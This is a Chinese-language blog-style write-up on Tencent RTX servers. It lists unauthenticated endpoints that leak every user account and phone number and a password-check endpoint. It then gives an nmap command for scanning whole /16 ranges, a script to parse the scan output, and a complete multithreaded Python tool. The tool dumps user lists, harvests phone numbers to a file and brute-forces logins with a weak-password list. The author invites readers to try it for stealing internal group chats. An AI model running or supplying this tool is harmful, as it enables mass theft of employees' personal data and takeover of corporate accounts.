rtx信息泄漏利结合弱口令导致被批量社工思路

腾讯通RTX（Real Time eXchange）是腾讯公司推出的企业级实时通信平台.

rtx server 存在暴露用户信息的漏洞,通过web访问

http://RtxServerIp:8012/userlist.php #泄漏公司所有rtx用户
http://RtxServerIp:8012/getmobile.cgi?receiver= #泄漏用户手机号
http://RtxServerIp:8012/check.php #验证弱口令

脚本化攻击思路:

1. sudo nmap -sS -T4 -Pn -p8012 xxx.xxx.xxx.0/16 -oX out.xml nmap 扫描大网段以基数来填补精度的不足,然后我们得到一个开着nmap扫描的out.xml文
2. 分析out.xml文件提取开放8012端口的ip
3. rtx攻击脚本处理这些ip,探测弱口令

步骤2 分析nmap结果的脚本xml.py

#!/usr/bin/env python
#-*- coding= utf-8 -*-
import xml.etree.ElementTree as ET

tree = ET.parse("out.xml")
doc = tree.getroot()
for x in doc:
    if x.tag == 'host':
        xlist = x.getchildren()
        ports  = xlist[3]
        port = ports.getchildren()[0]
        state = port.getchildren()[0]
        if state.get('state') == 'open':
            print xlist[1].get('addr')

步骤3 rtx server attack 脚本

#!/usr/bin/env python
#-*-coding=utf-8-*-
# date : 2013.12.16
# author : l137
# rtx hack

import threading
import urllib
import re
import sys
import getopt
import json
import threading
import httplib
import time

def usage():
    print '''
Usage : ./f.py -u target_ip
-h   Show this page!
'''

class postThread(threading.Thread):
 
    def __init__(self, data):
        threading.Thread.__init__(self)
        self.data = data
    def run(self):
        for x in self.data:
            try:
                print self.data
            except Exception, e:
                print e
                

class rtx(object):
    'rtx attacker class'
    ip = ''

    data = ''

    port = '8012'
    
    fullData = ''
    

    def __init__(self, ip):
        if self.checkIp(ip):
            self.ip = ip
            url = "http://"+ip+":"+self.port+"/userlist.php"
            try:
                content = urllib.urlopen(url).read()
                self.data = json.loads(content)
            except (IOError,ValueError),e:
                print "33[1;31m"+self.ip+"33[0m is not vulnerable!"
                sys.exit()
            self.checkVulnerable()
            #print self.data
            self.checkPhone()
            self.bruteforce()
        else:
            print " ______________"
            print " 33[07m  are you kidding me? 33[27m               "            
            print "                          "
            print "          33[1;31m,__,33[1;m             " 
            print "          33[1;31m(33[1;moo33[1;31m)____33[1;m        "
            print "           33[1;31m(__)    ) 33[1;m  "
            print "           33[1;31m   ||--|| 33[1;m33[05m*33[25m33[1;m      [ l137 | lietdai@gmail.com ]

"


    @staticmethod
    def checkIp(ip):
        pattern = r"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"
        if re.match(pattern, ip):
            return True
        else:
            return False

    def checkVulnerable(self):
        print "33[1;31m Oh...I got something!!"
        print " Please wait a bit....."
        #for x in range(len(self.data)):
        #    print self.data[x]
        print " "+str(len(self.data))+" records was found!! 33[0m"

    def checkPhone(self):
        print "33[1;31m Now check phone number in records.....33[0m"
        url = "http://"+self.ip+":"+self.port+"/getmobile.cgi?receiver="
        output = file('out.txt','w')
        for x in xrange(0,len(self.data)):
            url2 = url + self.data[x]['name']
            self.data[x]['phone'] = urllib.urlopen(url2).read()
            try:
                output.write(str(self.data[x]['id'])+'	'+self.data[x]['name']+'	'+self.data[x]['phone']+'
')
                print self.data[x]
            except Exception,e:
                print e
        output.close()
        print "33[1;31m put the records int out.txt33[0m"
        #print self.data

    def bruteforce(self):
        print "33[1;31m Brute force starting...."
        num = raw_input(" Please input the number of threads for brute force(default 10) : ")
        print " And it will take a little time ...33[0m"
        if num == '':
            num = 10
        else :
            try :
                num = int(num)                
            except ValueError,e:
                print e
                sys.exit()
            if (num < 1) or (num > 15):
                print "threads must in 1-15"
                sys.exit()
                
        threads = [];
        block = len(self.data)/num
        for i in xrange(0, num):
            if i == num-1:
                data = self.data[block*i:]
            else:
                data = self.data[i*block:(i+1)*block]
            t = threading.Thread(target=self.fwork, args = (self.port, self.ip, data))
            threads.append(t)
        for i in threads:
            i.start()

    @staticmethod
    def fwork(port,ip,b):
        for x in xrange(0,len(b)):
            dicts = ['111111','123456','qweasd','222222','12345678','000000','qusiba','666666']
            #dicts.append(b[x]['phone'])
            dicts.append(b[x]['name'])
            for x in dicts:
                httpClient = None
                try:
                    name = dicts[-1]
                    postData = urllib.urlencode({'user':name,'pwd':x})
                    headers = {"Content-type":"application/x-www-form-urlencoded", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"};
                    httpClient = httplib.HTTPConnection(ip, port, timeout=30)
                    httpClient.request("POST", "/check.php", postData, headers)
                    response = httpClient.getresponse()
                    responseHeader =  response.getheaders()
                    if responseHeader[1][1] == '2573':
                        print name,x
                except Exception, e:
                    print e
                finally:
                    httpClient.close()
    def getWeakPass(self):
        file_ob = open("password.txt")
        try:
            list_file = file_ob.readlines()
        finally:
            file_ob.close()
            for x in list_file:
                self.dists.append(x.strip('
'))

def main():
    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:h", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit()
    for o,a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o == "-u":
            r = rtx(a)
        else : 
            usage()
    if len(opts) == 0:
        usage()
    
if __name__ == "__main__" :
    main()

这里会获取很多很重要公司的员工rtx帐号,进入内网后可以窃取群聊内容.大家自己试试就行...

截图:

964条记录

参考:

http://www.wooyun.org/bugs/wooyun-2010-013290